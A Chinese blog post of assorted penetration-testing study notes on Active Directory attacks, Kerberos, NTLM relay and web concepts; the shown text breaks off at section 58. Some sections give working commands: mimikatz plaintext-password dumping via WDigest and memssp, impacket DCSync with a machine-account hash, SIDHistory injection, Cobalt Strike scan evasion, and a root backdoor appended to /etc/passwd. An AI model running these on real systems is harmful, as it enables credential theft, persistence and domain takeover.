杂记---- 拼搏现实的明天。 2022-11-20 08:20 646阅读 0赞 ### 文章目录 ### * 1. echo命令特性 * 2. msf * 3. 劫持explorer.exe黑屏 * 4. 影子账户 * 5. 烂土豆提权 * 6. mimikatz的powershell版(打不开) * 7. 远程线程注入原理 * 8. 命名管道 * 9. 委派要在域控上进行配置 * 10. 几种文件系统的区别 * 11. 绕过CS beacon config scan * 12. 解决mac电脑安装brew或者brew下载东西过慢 * 13. 误删.bash\_profile文件 * 14. pip命令相关报错与安装提速 * 15. 将python脚本转化为exe * 16. 黄金票据与白银票据、TGT与TICKET * 17. 黄金票据制作好后复制到域内另一台机器上使用,或者直接使用域控的tgt票据在另一台机器上使用,另一台机器没有这张票据中的session key,无法证明这张票据属于自己,为什么还能利用票据拿到域管理员权限呢? * 18. windows注册服务账户(域控才可以) * 19. 约束性委派中最终其作用的是那张可转发的TICKET,这张ticket与kerberos认证中的ticket除了可转发性其余一样吗? * 20. 约束性委派s4u2proxy中除了需要导入s4u2self得到的可转发的ticket外还需不需要导入被委派主机的tgt? * 21. SIDHistory * 22. 权限的状态到底有什么意义 * 23.域传送 * 24.事件id * 25.读取windows明文密码思路 * 补充:专业术语 * 26.安全团队的价值是什么 * 27.蜜罐的识别 * 28.CGI * 29.机器账号利用 * 30.vim显示行号跟去重 * 31.PHP-CLI是什么 * 32.使用xxe攻击利用system权限的服务进行ntlm认证并执行ntlm relay攻击 * 33.XSLT与XML * 34.xhtml、dtd、xml schema、xsd * 35.利用visual studio的项目配置实现编译后上线(build event) * 36.IP限制绕过实现3389登陆 * 37.linux添加账户 * 38. dcpwn原理/cve-2019-1040 * 39. ntlm-relay与cve-2019-1040的其他理解 * 40. magic\_quotes\_gpc 在PHP5.4被废除 * 41.SDL * 42.CI/CD(continuous integration/continuous delivery) * 43.devops/devsecops * 44.svchost.exe * 45.主动漏洞扫描与被动漏洞扫描的区别 * 46.溯源与反制 * 47.为什么需要堡垒机 * 48.内容安全 * 49.msf出现加载不起go模块 * 50. jwt(JSON Web Token)是做什么的? * 51.POST请求中必须的http头 * 52.XMLHttpRequest的作用 * 53. 同源策略 * 54.跨域 * 55. jsonp * 56. 序列化存在的意义是什么 * 57. selenium * 58. /etc/group * 59.卡巴斯基杀毒进程 * 60. 组策略禁用命令提示符的绕过方式 * 61. 如何删除-开头的文件 * 62. 水坑攻击与鱼叉攻击 * 63. c++连续创建两个int变量,两个变量地址相差不是4 * 64. debug与release编译有什么区别 * 65. 指针与句柄 * 66. 堆与栈 * 67. c++中的引用 * 68. ((void(\*)())Memory)();的理解 * 69. 判断一个exe是不是32位 * 70. 主机账号每30天自动修改一次密码 * 71. LDAP注入攻击 * 72. 开发模型:瀑布模型、敏捷模型 * 73. mac上wireshark抓包权限不够 * 74. 代码审计中的路由是什么意思 * 75. 使用git管理github上的仓库 * 76. 禁止机器账户的密码自动更改 * 77. win2012 standard激活 * 78. ACL、SACL、DACL、ACE、SDDL的区别 * 79. win10 激活 * 80. 不使用wget与curl实现http请求 * 81. 程序执行逻辑 * 82. 关于多次loadlibrary一个dll文件 * 83. CVE-2018-8581 * 84. python与java的默认安装路径 * 85. 理解DCShadow * 86. 用户态切换到内核态 * 87. 什么是CAS架构 * 88. zsh与插件的安装和基本配置 * 89. locate数据库更新 * 90. linux的history命令查询的是~/.bash\_history文件的内容(如果shell是bash的话) * 91 .mac下python2无pip解决方案 * 92. 解决kali上root远程ssh无法登陆与root远程无法登陆kali的mysql * 93. kali上mysql忘记密码 * * 方法1 * 方法2 * 94. javascript的理解 * * 客户端js * 服务端js * 95. VMware vSphere是什么 * * ESXi * Vcenter Server * 96. Wi-Fi破解 * * 1.查看自己ID无线网卡 * 2. 监听wifi看是否开启WPS功能: * 3. 破解pin码 * 97. 英文版mac系统如何将地图和日历设置为中文 * 98.MAC上使用bloodhound * 99. proxychains4配置文件位置 * 100. chrome路径 * 101. %00截断原理 # 1. echo命令特性 # echo命令会覆盖之前文件里面的东西 # 2. msf # msf中只有windows的原生平台payload才能进行migrate,其余例如python,php都是不可以的。 # 3. 劫持explorer.exe黑屏 # 劫持explorer.exe会导致系统黑屏,尽量不要用,尽量使用CLR劫持.NET程序与修改注册表键值UserInitMprLogonScrip的方法来达到权限维持。 # 4. 影子账户 # 修改RID来修改账号权限,只在win7系统有用,msf也有现成利用脚本post/windows/manage/rid\_hijack,参考文章[渗透技巧——Windows帐户的RID Hijacking][Windows_RID Hijacking] # 5. 烂土豆提权 # windows提权用juicy,一般用在webshell上。星标中有可以直接利用的程序。 ![在这里插入图片描述][20201117185009531.png_pic_center] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70_pic_center] # 6. mimikatz的powershell版(打不开) # `https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz` [mimikatz的九种加载方式][mimikatz] # 7. 远程线程注入原理 # 线程注入原理大概就是说我们通过一定的手段在宿主也就是需要被注入的进程那获取权限,得到权限之后我们要在这个进程上开辟一定的内存,然后把自己的线程函数内容以及参数什么的全都拷贝过去,这样目标进程上有我们的函数,我们的参数。 我们这个时候只需要"帮"它启动一下这个线程就OK了,直接用CreateRemoteThread函数在对方进程的某个内存位置的某个线程函数作为线程函数启动。 # 8. 命名管道 # 首先我们需要明确的一点,命名管道基于smb协议通信,smb,smb。重要的事情说三遍。它是用来让两个进程间进行通信的,这两个进程可以是本地进程,也可以是远程进程。命名管道有点类似于socket连接,是用来传输数据的,可以设置具体的权限让指定权限的进程才能连接命名管道,理论上每个程序都能连接命名管道,只是连接之后能做的事情不同,具体能做什么事跟服务端的配置有关系。 下面总结几点: 1.命名管道是C/S架构,必须让服务端某个进程先创建命名管道。 2.命名管道可以被任何符合权限的进程去访问,且何种权限可以访问是可以自定义的。 3.客户端可以是本地的某个进程或者远程的某个进程,本地进程访问命名管道方式为.\\pipe\\pipename,远程进程访问命名管道方法为\\ip\\pipe\\pipename。 4.在powershell中使用dir \\.\\pipe\\ | select name可以查看当前所有命名管道的名称。 命名管道还有一个特点就是但服务端进程被客户端进程连接的时候,理论上说服务端进程有可能`获取到客户端的权限`。ImpersonateNamedPipeClient()这个api可以帮助我们进行实现,前提是我们当前用户具有SeImpersontePrivilege权限。 # 9. 委派要在域控上进行配置 # # 10. 几种文件系统的区别 # 常见的几种文件共享相关的网络协议有: * CIFS * Samba * SMB * NFS CIFS是SMB协议的另一种实现或者说是派生,适用于Windows,且CIFS与SMB的客户端之间可以进行互相访问。 Samba协议一般在linux系统上,它能让Linux服务器实现文件服务器、身份授权和认证等功能,主要是为了实现让windows主机访问linux主机的共享文件。Samba也是SMB的一个变种,所以CIFS和SMB与Samba的客户端可以进行互访。 NFS是linux主机专有的文件共享协议,只支持linux主机之间的互访。 # 11. 绕过CS beacon config scan # * 反编译CS改源代码 * 在Sites上删掉stager与stager64,当需要使用的时候在listeners中选择监听点击编辑然后点击确定即可恢复,等待主机上线后再删掉这两个选项即可避免被检测到。 * 使用域前置重定向等技术 # 12. 解决mac电脑安装brew或者brew下载东西过慢 # 使用中科院的镜像,具体操作看: [Mac安装Homebrew慢,解决办法][Mac_Homebrew] [Mac OS X 包管理工具 Homebrew 安装与使用][Mac OS X _ Homebrew] -------------------- /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/uninstall)" /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" /bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" #安装brew git -C "$(brew --repo)" remote set-url origin https://mirrors.ustc.edu.cn/brew.git git -C "$(brew --repo homebrew/core)" remote set-url origin https://mirrors.ustc.edu.cn/homebrew-core.git git -C "$(brew --repo homebrew/cask)" remote set-url origin https://mirrors.ustc.edu.cn/homebrew-cask.git echo 'export HOMEBREW_BOTTLE_DOMAIN=https://mirrors.ustc.edu.cn/homebrew-bottles' >> ~/.zshrc echo 'export PATH=$PATH:/opt/metasploit-framework/bin' >> ~/.zshrc echo 'alias java8="/Library/Internet\ Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/Java" ' >> ~/.zshrc echo "alias updatedb='sudo /usr/libexec/locate.updatedb'" >> ~/.zshrc brew update # 13. 误删.bash\_profile文件 # > Mac系统的环境变量,加载顺序为: > /etc/profile > /etc/paths > ~/.bash\_profile > ~/.bash\_login > ~/.profile > ~/.bashrc 在命令行输入export PATH=/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 然后使用vim命令编辑~/.bash\_profile文件加入正确的环境变量即可。 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70] # 14. pip命令相关报错与安装提速 # python使用pip安装包的时候出现ERROR: Command errored out with exit status 1: python setup.py egg\_info Check the logs for full command output. 安装下面这两个包即可: python -m pip install --upgrade setuptools python -m pip install --upgrade pip 使用:pip install django -i https://pypi.tuna.tsinghua.edu.cn/simple 可以提高安装速度,参考文章:[提高pip安装速度][pip] # 15. 将python脚本转化为exe # 要求:python版本小于3.6且安装了pyinstaller pyinstaller安装方式:pip install pyinstaller # 16. 黄金票据与白银票据、TGT与TICKET # 黄金票据与白银票据本质是一样的,区别是取决于加密票据的是krbtgt的hash还是其他服务的hash。黄金票据说白了就是知道了krbtgt的hash后可以伪造一张ticket,这个ticket可以访问krbtgt/domain\_name服务。白银票据是得到了某个服务的hash,然后伪造一个ticket这个ticket有权限访问那个服务。其实krbtgt就是KDC服务。 黄金票据伪造了TGT后,我们就会拥有一个伪造后高权限的TGT,还会有一个SESSION key,这样子才能进行后续的kerberos认证,只有TGT没有session key是无法进行后续认证。 TGT与TICKET本质没啥区别,只是用途不一样,我们把访问TGS服务所需要的票据称为TGT,它是被TGS的服务账户也就是krbtgt的hash加密的。 TICKET是访问其他服务所需的票据,是被其他服务的hash加密的。 # 17. 黄金票据制作好后复制到域内另一台机器上使用,或者直接使用域控的tgt票据在另一台机器上使用,另一台机器没有这张票据中的session key,无法证明这张票据属于自己,为什么还能利用票据拿到域管理员权限呢? # 其实黄金票据制作好后同时也会将session key保存在机器中,如果我们使用mimikatz将票据导出的话,导出的文件中含有的其实是tgt与session key。 # 18. windows注册服务账户(域控才可以) # setspn -u -s host/wangmazi wangmazi ![在这里插入图片描述][2020122116043858.png] 如果权限不够就会报错: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1] 创建好后就可以给账号配置约束性委派了: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2] # 19. 约束性委派中最终其作用的是那张可转发的TICKET,这张ticket与kerberos认证中的ticket除了可转发性其余一样吗? # 一样的,本质走的都是kerberos协议。 # 20. 约束性委派s4u2proxy中除了需要导入s4u2self得到的可转发的ticket外还需不需要导入被委派主机的tgt? # 不需要。 # 21. SIDHistory # SIDHistory属性的存在是为了解决用户在迁移到另一个域中的时候权限会改变的问题。例如用户zhangsan在A域中本来是管理员,迁移到B域的时候因为sid的改变有可能会变成普通用户权限,这时候如果给zhangsan用户添加一个值为zhangsan在A域中的SID的SIDHistory值就可以解决这个问题,`只有域管有更改SIDHistory的权利`。 给zhangsan用户添加域管的sid: privilege::debug sid::add /sam:zhangsan /new:administrator # 22. 权限的状态到底有什么意义 # ![在这里插入图片描述][20210104171123922.png] 如上图所示,我们可以看到权限的状态是disabled,这个disabled并不代表用户不能去使用这些特权,disabled只代表当前程序没有这个特权,但是只要特权显示出来了,那么用户就拥有来这些特权,如果仅仅作为用户的角度的话我们可以直接忽略掉这些权限的状态,因为在必要的时候系统会为我们自动开启。 那disabled这种状态为什么会存在呢?那就是为了限制程序的执行了。 举个例子,SeShutdownPrivilege权限的状态是disabled,我们用户还是可以在cmd窗口中执行shutdown命令关闭主机,但是其他程序就不可以调用windows的api来关闭主机,如果其他程序想调用windowsapi关闭主机的话就得先调用一个名为AdjustTokenPrivileges的api来将SeShutdownPrivilege的状态转变为enable,之后才能进行关闭主机。总的来说权限的状态对于用户态的我们毫无影响,对于一些程序会有一定的影响。 设置权限状态为enable方式可参考代码:EnablePrivilegeandGetTokenInformation.cpp # 23.域传送 # https://www.jianshu.com/p/d2af08e6f8fb # 24.事件id # 4624 登录成功 4625 登录失败 4634 注销成功 4647 用户启动的注销 4672 使用超级用户/管理员用户进行登录 4720 创建用户 4697 7045 PsExec # 25.读取windows明文密码思路 # 1.修改注册表让mimikatz可以读取明文密码,然后使用cmd锁屏让用户重新登陆。 \#开启wdigest Auth读取明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f \#强制锁屏 rundll32 user32.dll,LockWorkStation \#读取密码 mimikatz.exe log privilege::Debug sekurlsa::logonpasswords exit type mimikatz.log | find /i "password" ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4] 2.使用mimikatz的ssp,然后使用cmd让屏幕锁屏。 copy mimilib1.dll C:\Windows\System32\ reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "C:\Windows\System32\mimilib1.dll" /t REG_MULTI_SZ / mimikatz.exe privilege::debug misc::memssp exit rundll32 user32.dll,LockWorkStation type C:\Windows\System32\mimilsa.log ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 5] # 补充:专业术语 # soc 安全运营中心 SOP同源策略 edr 终端安全响应系统 SSID wifi的名字 csp 内容安全策略 Ioc 可以理解成资产的指纹,可以是ip或者md5 IDC 可以理解成机房,IDC服务器就是机房的服务器 Ops 可以理解成运维,其实表达的是operation。 ICG 上网行为管理 dev 开发工程师 SDL 安全开发周期 [JIRA][] 项目任务管理软件 Confluence 企业知识管理与协同软件 devsecops 一个完全覆盖安全防护或者按照安全准则的应用开发模式。 CI/CD CI/CD或CICD通常指的是持续集成和持续交付或持续部署的组合实践 SaaS软件即服务 可以理解成通过一个软件提供服务,这个软件是一个别人已经写好的东西,你无法进行定大量制化,一般只能进行使用,通过购买软件来购买别人提供的服务,这种服务一般是按年付费的而不是买断型的。 [参考文章1][1] [参考文章2][2] IaaS 基础架构即服务,通过基础架构来提供服务,比如计算机厂商卖给你一个计算机,这个计算机没有装操作系统,只装了硬件,你可以在这个基础上进行DIY。 PaaS 平台即服务 还是计算机厂商,它除了硬件之外给你装了操作系统,但是里面一个软件都没有,你得自己装,它只给你提供了操作系统的平台而已。 SIEM 安全信息和事件管理 DevOps(Development和Operations的组合词)是一种重视“软件开发人员(Dev)”和“IT运维技术人员(Ops)”之间沟通合作的文化、运动或惯例。透过自动化“软件交付”和“架构变更”的流程,来使得构建、测试、发布软件能够更加地快捷、频繁和可靠。[参考文章][Link 1] # 26.安全团队的价值是什么 # 安全团队的价值是降低业务风险,进一步价值是提升业务的核心竞争力,终极价值是成为盈利单元。把内部业务服务好了,下一步就是能力输出。 # 27.蜜罐的识别 # freebuf.com/articles/network/236485.html 1. BOF的识别;BOF(Back Officer Friendly) 2. 假代理技术,关注Honeypot Hunter软件; 3. Honeyd的识别; 4. 利用Sebek识别蜜网,第二、三代蜜网都有这个软件; 5. Tarpits的识别; 6. 外联数据控制识别,一般蜜罐会严格限制系统向外的流量; 7. 识别VMware虚拟机,重点关注MAC地址的范围 8. 用Nmap等Scan工具,同一个机器同时开放很多Port的。 9. 因为很多蜜罐都设置在相同或临近的网段。所以,同一个网段(e.g. /24),很多机器都开放相同的Port,回应相似的Response。 10. 去Shodan/Censys查 # 28.CGI # CGI是一个协议,实现CGI协议的程序叫做CGI程序。CGI程序可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如php,perl,tcl等,常见的实现方式有FASTCGI。 CGI程序可以理解成一个接口,比如说一个php网站,当用户发送了一个静态请求的时候,例如请求一个静态的html页面,这时候CGI程序不会启动。但是当用户发送了一个动态请求比如请求一个数据库查询,这时候CGI程序就会去进行数据库查询,然后将回显返回到web容器,然后web容器根据之前写的代再将数据处理后再将回显返回到用户浏览器。 总的来说,静态请求(请求之前已经写死的东西)不会涉及到CGI程序,动态请求(实时变化的东西例如数据库、当前时间等)一般会用到CGI程序。 https://www.jianshu.com/p/80e46a80fdbd # 29.机器账号利用 # 机器账号的hash也可以直接进行pth攻击,域控的机器账户具有dcsync权限。 获取到域控主机的主机账户时候的利用方式: 在普通机器上先使用getst脚本获取主机账户的凭据,然后再使用secretdump脚本利用dcsync权限读取密码,这两个脚本都在impacket中。 python getST.py -dc-ip 192.168.124.142 -spn krbtgt/test.com test.com/yukong$ -hashes :0fa65385ff8a2dac9badc773545a2243 set KRB5CCNAME=yukong$.ccache python secretsdump.py -k -no-pass yukongs ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 6] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 7] 获取普通账户的主机账户权限: 利用rebues工具获取到对方的shell,[具体操作点这里][Link 2]。 [域渗透:使用MachineAccount实现DCSync][MachineAccount_DCSync] # 30.vim显示行号跟去重 # set nu #显示行号 sort #排序 g/^\(.*\)$\n\1$/d #去除重复行 # 31.PHP-CLI是什么 # CLI 全称 command-line interface 直译过来 命令行接口 维基上 是 命令行界面 一般我们在 Linux 操作系统时是没有操作界面的,那要怎么才能执行程序或者对程序进行编译 这个时候就需要一些实现了 CLI 的工具, PHP-CLI 就是这样一个程序 可以在命令行下直接运行PHP程序 常用来开发 PHP 的外壳应用 后台应用 PHP-FPM就是一个实现了fastcji协议的实体程序,全名是Fast-cij process manager。 [PHP中CGI、CLI、FPM是什么][PHP_CGI_CLI_FPM] # 32.使用xxe攻击利用system权限的服务进行ntlm认证并执行ntlm relay攻击 # 此时会用当前机器的机器账号认证。如果能得到机器账号的凭据,并将其委派到机器账号所在的机器上,这时候就能更改此机器的基于资源的约束性委派的属性值然后进行基于资源的约束性委派攻击。 # 33.XSLT与XML # XSLT定义了XML的显示方式,例如可以讲XML数据以表格的形式展现出来。 没加XSLT文件前: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 8] 加了XSLT文件后: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 9] # 34.xhtml、dtd、xml schema、xsd # * xhtml就是用xml格式编写的html文件后缀名为.html。 * DTD全名为文档类型定义,简单点说就是定义xml文档中可以有什么,不可以有什么,以及元素的类型,文件后缀名为.dtd。 * xml schema是DTD的更新换代产品。 * xsd 是一种xml schema的一种类型,全称为xml schema definition。xsd会描述一组规则,这个xml文件必须遵守这组规则,文件后缀名为.xsd。 [如何使用 XSD?][XSD] # 35.利用visual studio的项目配置实现编译后上线(build event) # 利用visual studio的项目设置,来设置当编译当时候执行某些命令,借此来实现让对方上线。 [利用build event实现木马上线][build event] # 36.IP限制绕过实现3389登陆 # https://mp.weixin.qq.com/s/FMGqJx0GbhxXfdnFS929zQ # 37.linux添加账户 # 添加一个sec账户,密码为1. echo "sec:\$6\$FoSOR5oP6rcipJfo\$YNw1572OzKfizVuswP408qp6Qp5MyELFqZfivgTlWhmVsl0W9bL9AKga//ZgWK/CNbZMbT6H51RFOyJGcCSG10:777:0:sec:/home/sec:/bin/bash" >> /etc/passwd # 38. dcpwn原理/cve-2019-1040 # cve的利用点是修改mic标志使得通过smb得到的ntlm可以被转发到到ldap服务进行身份验证,并获得对应权限,如果不绕过mic标志,则不能实现上面的转发,或者说转发无效。 dcpwn是利用了cve-2019-1040,先获取一个域内主机的权限,使用spoolservice漏洞获取域内ldap服务器的ntlm-hash并使用cve20191040删除掉mic标识位,然后relay到真正的域控进行身份验证,接着添加一个机器账户并将这个机器账户设置成域控主机的基于资源的约束性委派的信任主机。然后利用这个机器账户,我们就可以控制域控进而控制整个域。 # 39. ntlm-relay与cve-2019-1040的其他理解 # 1. 通过smb得到的ntlm-hash一般是无法进行身份认证的,最多只能进行RCE,因为这种ntlm-hash有mic标识位,并且这种标识为无法改变。如果可以移除掉mic标识位,那么通过smb得到的ntlm-hash就可以配合ntlm-relay攻击进行身份验证并执行其他操作,例如修改其他账号的ldap属性。 2. cve-2019-1040可以删除通过smb得到的ntlm-hash的mic标识位,并且使得此hash依旧有效,可以配合ntlm-relay进行身份验证。 3. spoolservice漏洞可以出发目标主机对当前主机的smb身份验证,如果对exchange服务器进行此漏洞的利用,会使得exchange服务器的机器账户来进行smb身份验证。 4. exchange机器账户默认可以修改Domain object对象的所有属性,domain object就是域内所有的主机与用户。 5. 使用exchange机器账户的权限,修改域控主机的基于资源的约束性委派的配置可以控制域内所欲主机。或者选择给域内某个主机赋予dcsync权限,这样子也能变像获得域内所有主机的权限。 6. ntlm-relay不能将ntlm认证relay回原机器。例如截取到exchange主机的ntlm-hash,可以将其relay到域内其他主机上进行rce攻击,但不能将其relay回exchange主机进行命令执行。 # 40. magic\_quotes\_gpc 在PHP5.4被废除 # 数字型的sql注入魔术引号已经没什么用了,必须使用intval()函数将用户的输入全部转化为数字才行。 # 41.SDL # 整个SDL并未注重运维,微软为了弥补这个缺陷推出了OSA(Operational Security Assurance)。 ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 10] SDL在研发、测试之外定义了安全的角色,通过流程上的保证,使安全人员及其工作能够嵌入到研发过程中的各个环节,以此来降低产品中出现安全漏洞的风险。 # 42.CI/CD(continuous integration/continuous delivery) # CI/CD或CICD通常指的是持续集成和持续交付或持续部署的组合实践 # 43.devops/devsecops # DevOps(Development和Operations的组合词)是一种重视“软件开发人员(Dev)”和“IT运维技术人员(Ops)”之间沟通合作的文化、运动或惯例。透过自动化“软件交付”和“架构变更”的流程,来使得构建、测试、发布软件能够更加地快捷、频繁和可靠。[参考文章][Link 1] devsecops就是在devops研发周期中添加了安全防护,有点类似于SDL加上ops。 # 44.svchost.exe # svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。这个程序对系统的正常运行是非常重要,而且是不能被结束的。许多服务通过注入到该程序中启动,所以会有多个该文件的进程。 # 45.主动漏洞扫描与被动漏洞扫描的区别 # 主动漏洞扫描是测试者自己提供url然后扫描器进行扫描。 被动漏洞扫描,扫描器是一个代理卡在用户与目标站点之间,且会自动扫描用户浏览过的所有页面。除此之外其余都一样。 # 46.溯源与反制 # 反制: > 1、首先定位问题原因,确认中了木马 > 2、对进程,启动项,计划任务,后门,账户全部进行清除 > 3、通过审计木马、web日志定位入口点与攻击者ip > 4、对入侵者IP进行反制攻击 溯源: > 1、首先定位问题原因,确认中了木马 > 2、对进程,启动项,计划任务,后门进行清除 > 3、通过审计木马、web日志定位入口点与攻击者ip > 4、对目标进行溯源 # 47.为什么需要堡垒机 # 之前一直是使用的跳板机来对运维人员的远程登录进行集中管理,但是跳板机并没有实现对运维人员的操作行为进行控制和审计,导致在使用跳板机的过程中如果出现安全事件,不太容易定义到人,此外跳板机还有严重的安全风险。 因此人们需要一种能满足角色管理与授权审批、信息资源访问控制、操作记录和审计、系统变更和维护控制要求,并生成一些统计报表配合管理规范来不断提升IT内控的合规性的产品,堡垒机就诞生了。 堡垒机的建设目标是为了知道以下几件事,总的来说还是为了降低运维风险: > 审计:你做了什么?(What) > 授权:你能做哪些?(Which) > 账号:你要去哪?(Where) > 认证:你是谁?(Who) > 来源:访问时间?(When) [什么是堡垒机?为什么需要堡垒机?][Link 3] # 48.内容安全 # 黄赌毒暴恐政等低俗或者反社会的东西都属于内容安全的管辖范畴。 主动合规的思路: 合法合规、综合治理、快速处置 # 49.msf出现加载不起go模块 # ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 11] 输入下面命令即可: go env -w GO111MODULE=off # 50. jwt(JSON Web Token)是做什么的? # JWT是目前最流行的跨域认证解决方案。 在了解JWT之前我们首先得知什么是跨域认证与跨域认证的其他解决方案是什么,举例如下: > A 网站和 B 网站是同一家公司的关联服务。现在要求,用户只要在其中一个网站登录,再访问另一个网站就会自动登录,请问怎么实现? > > 一种解决方案是 session > 数据持久化,写入数据库或别的持久层。各种服务收到请求后,都向持久层请求数据。这种方案的优点是架构清晰,缺点是工程量比较大。另外,持久层万一挂了,就会单点失败。 > > 另一种方案是服务器索性不保存 session 数据了,所有数据都保存在客户端,每次请求都发回服务器。JWT 就是这种方案的一个代表。 JWT可以理解成一种token,在访问的时候加到数据包里代表访问用户的身份。 参考文章: [JWT入门教程][JWT] # 51.POST请求中必须的http头 # POST /ssrf/base/post.php HTTP/1.1 host:192.168.0.109 Content-Type:application/x-www-form-urlencoded Content-Length:11 name=tom&passwd=123 # 52.XMLHttpRequest的作用 # XMLHttpRequest是JS中的一个对象,通过它可以实现不刷新整个网页的情况下更新网页的部分数据,类似于百度的输入框,我们输入不同的字符的时候会有下拉框告诉我们相关的输入,但是整个网页没有更新,更新的只有下拉框,这个就是XMLHttpRequest对象的作用。 `上述的这种技术叫做AJAX ,XMLHttpRequest是这个技术中核心的一个点。` 通过XMLHttpRequest可以实现: 1.在不重新加载页面的情况下更新网页 2.在页面已加载后从服务器请求数据 3.在页面已加载后从服务器接收数据 4.在后台向服务器发送数据 XMLHttpRequest 可以同步或异步请求web服务器上的资源,并且能够以文本或者一个 DOM 文档的形式返回内容,是实现ajax技术的核心。 XMLHttpRequest在进行http请求的时候有好几个状态也就是readyState属性,分别如下: ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 12] 每更改一次状态,就要执行一次onreadystatechange函数。 XMLHttpRequest对象还有其他的属性: <table> <thead> <tr> <th>属性</th> <th>作用</th> </tr> </thead> <tbody> <tr> <td>responseText</td> <td>请求后的响应数据(不包括http头)</td> </tr> <tr> <td>responseXML</td> <td>将响应转化为XML并作为Document对象返回</td> </tr> <tr> <td>status</td> <td>http状态码</td> </tr> <tr> <td>statustext</td> <td>http状态码的文字形式</td> </tr> </tbody> </table> 参考文章: [XML DOM][] [AJAX][] # 53. 同源策略 # 所谓同源是指三个相同 协议相同 域名相同 端口相同 为了保护用户凭据而出现的。 # 54.跨域 # 1. 什么是跨域 当用户对不同协议或不同端口或不同域名的资源进行访问时,就是跨域。 2. 为什么会造成跨域 因为有些业务需要跨域访问资源,而又因为同源策略的存在导致会阻碍我们的跨域行为。同源策略规定:XHR对象只能访问与包含它的页面位于同一域中的资源,有利于预防一些恶意行为。 3. 怎么解决跨域 解决办法有很多,CORS、iframe、h5新特性postMessage等,而比较简单的方法就是今天着重介绍的jsonp。 解决依据:尽管不能访问非本域的动态资源,但是类似js文件、样式、图片等静态资源是可以访问的!就是通过这个“漏洞”来解决跨域问题。用`<script>`标签中的src来写入跨域数据的url,这样就能绕过同源策略了。。“老师,他作弊!” # 55. jsonp # JSONP,JSON with Padding的简写,这个全称对jsonp的理解还是有一定的帮助的。填充式JSON或者说是参数式JSON。JSONP的语法和JSON很像,简单来说就是在JSON外部用一个函数包裹着。JSONP基本语法如下: callback(\{ “name”: “kwan” , “msg”: “获取成功” \}); JSONP两部分组成:回调函数和里面的数据。回调函数是当响应到来时,应该在页面中调用的函数,一般是在发送过去的请求中指定。 JSONP原理: 刚才的解决依据可知,JSONP原理就是动态插入带有跨域url的`<script>`标签,然后调用回调函数,把我们需要的json数据作为参数传入,通过一些逻辑把数据显示在页面上。 # 56. 序列化存在的意义是什么 # `1、方便保存 2、方便在网络上传输` 网络上只能传输字节流数据,对象本是无法在网络上直接进行传输的。而序列化技术可以将对象进行字节流化,进而在网络上进行传输。 # 57. selenium # 一个web测试工具,可以理解成一种爬虫,可以完全模仿人类对浏览器进行一些操作,例如浏览网页等。 支持的浏览器包括IE(7, 8, 9, 10, 11),Mozilla Firefox,Safari,Google Chrome,Opera,Edge等。这个工具的主要功能包括:测试与浏览器的兼容性——测试你的应用程序看是否能够很好得工作在不同浏览器和操作系统之上。 # 58. /etc/group # `cat 